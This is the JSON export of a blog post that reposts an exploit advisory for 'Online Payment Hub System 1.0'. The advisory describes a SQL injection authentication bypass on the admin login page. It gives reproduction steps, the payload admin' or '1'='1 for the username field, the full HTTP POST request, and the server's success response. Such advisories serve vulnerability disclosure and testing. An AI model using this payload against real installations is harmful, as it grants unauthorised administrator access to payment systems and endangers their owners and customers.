{"id":57205,"date":"2024-05-31T20:40:15","date_gmt":"2024-05-31T16:40:15","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178877\/ophs10-sql.txt"},"modified":"2024-05-31T20:40:15","modified_gmt":"2024-05-31T16:40:15","slug":"online-payment-hub-system-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-payment-hub-system-1-0-sql-injection\/","title":{"rendered":"Online Payment Hub System 1.0 SQL Injection"},"content":{"rendered":"<p># Exploit Title: Online Payment Hub System &#8211; SQLi Authentication Bypass<br \/># Date: 29.05.2024<br \/># Exploit Author: Hamit Av\u015far<br \/># Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15018\/online-payment-hub-using-php-and-paypal-free-source-code.html<br \/># Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=15018&amp;title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code<br \/># Version: 1.0<br \/># Tested on: Windows 11, Kali Linux<br \/># Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.<\/p>\n<p>Steps To Reproduce:<br \/>1 &#8211; Go to the login page http:\/\/localhost\/oph\/admin\/login.php<br \/>2 &#8211; Enter the payload to username field as &#8220;admin&#8217; or &#8216;1&#8217;=&#8217;1&#8221; without double-quotes and type anything to password field.<br \/>3 &#8211; Click on &#8220;Login&#8221; button and you are logged in as administrator.<\/p>\n<p>PoC<\/p>\n<p>Request<\/p>\n<p>POST \/oph\/classes\/Login.php?f=login HTTP\/1.1<br \/>Host: localhost<br \/>Content-Length: 42<br \/>sec-ch-ua: &#8220;Chromium&#8221;;v=&#8221;111&#8243;, &#8220;Not(A:Brand&#8221;;v=&#8221;8&#8243;<br \/>Accept: *\/*<br \/>Content-Type: application\/x-www-form-urlencoded; charset=UTF-8<br \/>X-Requested-With: XMLHttpRequest<br \/>sec-ch-ua-mobile: ?0<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/111.0.5563.65 Safari\/537.36<br \/>sec-ch-ua-platform: &#8220;Windows&#8221;<br \/>Origin: http:\/\/localhost<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: cors<br \/>Sec-Fetch-Dest: empty<br \/>Referer: http:\/\/localhost\/oph\/admin\/login.php<br \/>Accept-Encoding: gzip, deflate<br \/>Accept-Language: en-US,en;q=0.9<br \/>Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i<br \/>Connection: close<\/p>\n<p>username=admin&#8217;+or+&#8217;1&#8217;%3D&#8217;1&amp;password=hamit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>response<\/p>\n<p>HTTP\/1.1 200 OK<br \/>Date: Wed, 29 May 2024 17:15:28 GMT<br \/>Server: Apache\/2.4.58 (Win64) OpenSSL\/3.1.3 PHP\/8.0.30<br \/>X-Powered-By: PHP\/8.0.30<br \/>Expires: Thu, 19 Nov 1981 08:52:00 GMT<br \/>Cache-Control: no-store, no-cache, must-revalidate<br \/>Pragma: no-cache<br \/>Access-Control-Allow-Origin: *<br \/>Content-Length: 20<br \/>Connection: close<br \/>Content-Type: text\/html; charset=UTF-8<\/p>\n<p>{&#8220;status&#8221;:&#8221;success&#8221;}<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Online Payment Hub System &#8211; SQLi Authentication Bypass# Date: 29.05.2024# Exploit Author: Hamit Av\u015far# Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/15018\/online-payment-hub-using-php-and-paypal-free-source-code.html# Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=15018&amp;title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code# Version: 1.0# Tested on: Windows 11, Kali Linux# Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter. Steps To Reproduce:1 &#8211; Go to &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57205","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57205","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57205"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57205\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57205"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57205"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57205"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}